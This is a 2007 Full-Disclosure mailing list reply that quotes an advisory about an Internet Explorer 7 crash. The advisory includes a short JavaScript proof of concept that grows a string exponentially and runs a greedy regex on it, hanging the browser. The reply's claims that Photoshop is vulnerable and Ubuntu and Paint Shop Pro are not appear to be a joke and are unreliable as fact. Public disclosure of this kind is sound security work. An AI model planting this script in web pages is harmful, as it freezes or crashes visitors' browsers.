Date: Tue, 17 Apr 2007 17:53:34 -0400
From: "Dr. Neal Krawetz, PhD" <neal.krawetz@....hush.com>
To: <full-disclosure@...ts.grok.org.uk>, <sil@...iltrated.net>
Subject: Re: Internet Explorer Crash

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

I have confirmed that both Adobe Photoshop 7.0 and 7.1 are
vulnerable to this issue.  However all versions of Paint Shop Pro
that I tested are not vulnerable.  I repeat, Paint Shop Pro is not
vulnerable to this issue.

Ubuntu is not vulnerable to this issue in any way.

Good find buddy!

- - Dr. Neal Krawetz, PhD
http://www.hackerfactor.com/blog/


On Tue, 17 Apr 2007 13:09:50 -0400 "J. Oquendo"
<sil@...iltrated.net> wrote:
>Product: Internet Explorer Version 7.0.5730.11
>Impact: Browser crash possibly more
>Author: Jesus Oquendo
>echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'
>
>
>I. BACKGROUND
>Why bother? Who doesn't know what Internet Explorer and Microsoft
>are.
>
>II. DESCRIPTION
>IE 7 is vulnerable to a script which causes the browser to hang. The
>memory and CPU usage go through the roof. Originally the script caused
>(and still causes) Safari and Konqueror to crash.
>
>III SOLUTION
>Stop using Microsoft products or deal with a new advisory every other
>day.
>
>IV. Proof
>http://www.infiltrated.net/stupidInternetExploder.html
>
>V. Code
>
>$ more /stupidInternetExploder.html
>
><script>
>
>var reg = /(.)*/;
>
>var z = 'Z';
>                while (z.length <=
>9999999999999999999999999999999999999999999999999999999999999999999
>99999999999999999999999999999999999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999
>999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999
>999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999
>999999999999999999999999
>9999999999999999999999999999999999999999999999999999999999999999999
>99999999999999999999999) z+=z;
>        var boum = reg.exec(z);
>
></script>
>
>Goodbye
>
>
>J. Oquendo
>http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
>sil . infiltrated @ net http://www.infiltrated.net
>
>The happiness of society is the end of government.
>John Adams
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

-----END PGP SIGNATURE-----


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
